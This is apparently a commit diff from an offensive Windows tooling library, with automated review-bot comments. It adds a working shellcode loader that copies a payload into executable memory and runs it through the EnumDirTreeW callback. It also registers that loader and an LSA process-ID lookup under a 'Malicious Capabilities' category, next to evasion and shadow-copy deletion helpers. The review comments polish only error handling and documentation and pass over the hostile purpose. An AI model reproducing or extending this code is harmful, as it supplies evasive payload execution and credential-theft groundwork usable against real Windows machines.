hModule = TryLoadDllMultiMethodW((PWCHAR)L"dbghelp.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SymInitialize = (SYMINITIALIZEW)GetProcAddressA((DWORD64)hModule, "SymInitializeW");
|
||||
SymCleanup = (SYMCLEANUP)GetProcAddressA((DWORD64)hModule, "SymCleanup");
|
||||
EnumDirTree = (ENUMDIRTREEW)GetProcAddressA((DWORD64)hModule, "EnumDirTreeW");
|
||||
|
||||
if (!SymInitialize || !SymCleanup || !EnumDirTree)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
|
||||
|
||||
EnumDirTree(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, BinAddress, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (BinAddress)
|
||||
VirtualFree(BinAddress, 0, MEM_RELEASE);
|
||||
|
||||
return (bFlag ? 0 : 0xffffffff);
|
||||
}
|
||||
|
||||
|
||||
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
|
||||
{
|
||||
return CreateThreadAndWaitForCompletion(UnusedSubroutineDisposeableThreadEnumDirTreeW, Sei, INFINITE);
|
||||
}
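Review bot: In UnusedSubroutineDisposeableThreadEnumDirTreeW, `SymCleanup(InlineGetCurrentProcess)` is reached only on the success path, so when VirtualAlloc fails after SymInitialize has already succeeded the symbol-handler state registered for this process is never released; the smallest fix is `if (BinAddress == NULL) { SymCleanup(InlineGetCurrentProcess); goto EXIT_ROUTINE; }`, or alternatively a `BOOL bSymInitialized` flag consulted in EXIT_ROUTINE so teardown stays symmetric with setup. The return values of EnumDirTree and VirtualFree are discarded without comment; if that is deliberate, a short `// return value intentionally ignored` on each line prevents a later reader from treating it as an oversight. A one-line comment on `DisposeableBuffer` saying it only satisfies EnumDirTreeW's OutputPathBuffer parameter and is never read would also explain the name.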
@ -170,8 +170,8 @@
<ClCompile Include="GetPidFromEnumProcesses.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQuerySystemInformation.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcingW.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcing.cpp" />
|
||||
<ClCompile Include="GetPidFromWindowsTerminalService.cpp" />
|
||||
<ClCompile Include="GetPidFromWmiComInterface.cpp" />
|
||||
<ClCompile Include="GetProcAddress.cpp" />
|
||||
@ -209,6 +209,7 @@
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
|
||||
<ClCompile Include="MpfComModifyShortcutTarget.cpp" />
|
||||
<ClCompile Include="MpfComVssDeleteShadowVolumeBackups.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
@ -230,6 +231,7 @@
<ClCompile Include="ShellcodeExecViaEnumDateFormatsW.cpp" />
|
||||
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp" />
|
||||
<ClCompile Include="ShellcodeExecViaEnumDesktopWindows.cpp" />
|
||||
<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp" />
|
||||
<ClCompile Include="StringCompare.cpp" />
|
||||
<ClCompile Include="StringConcat.cpp" />
|
||||
<ClCompile Include="StringCopy.cpp" />
|
||||
@ -369,7 +369,7 @@
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromPidBruteForcingW.cpp">
|
||||
<ClCompile Include="GetPidFromPidBruteForcing.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TryLoadDllMultiMethod.cpp">
|
||||
@ -381,7 +381,7 @@
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp">
|
||||
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecViaCertEnumSystemStore.cpp">
|
||||
@ -411,6 +411,12 @@
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
@ -148,6 +148,7 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension);
DWORD GetPidFromNtQueryFileInformationW(_In_ PWCHAR FullBinaryPath);
|
||||
DWORD GetPidFromNtQueryFileInformationA(_In_ PCHAR FullBinaryPath);
|
||||
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension);
|
||||
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension);
|
||||
|
||||
//malicious capabilities
|
||||
DWORD OleGetClipboardDataA(_Inout_ PCHAR Buffer);
|
||||
@ -167,6 +168,8 @@ BOOL ShellcodeExecViaEnumChildWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
BOOL ShellcodeExecViaEnumDateFormatsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
BOOL ShellcodeExecViaEnumDesktopWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
BOOL ShellcodeExecViaEnumDesktopsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
DWORD MpfGetLsaPidFromNamedPipe(VOID);
|
||||
|
||||
//evasion
|
||||
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
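Review bot: The new `DWORD MpfGetLsaPidFromNamedPipe(VOID);` prototype gives callers no way to tell how failure is reported, and the implementation added in this commit returns -1 when the ntdll exports cannot be resolved but 0 when the pipe open or the FSCTL fails; a doc comment on the declaration, e.g. `// Returns the LSA PID; 0 if the pipe query failed, (DWORD)-1 if ntdll exports could not be resolved`, makes the contract visible where Main.cpp consumes the value. The same applies to the new `GetPidFromPidBruteForcingExA` prototype, whose implementation like its W sibling returns 0 both for "no matching process" and for every error path, so a comment stating that 0 is the only failure indication would save callers from inventing a distinction.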
|
||||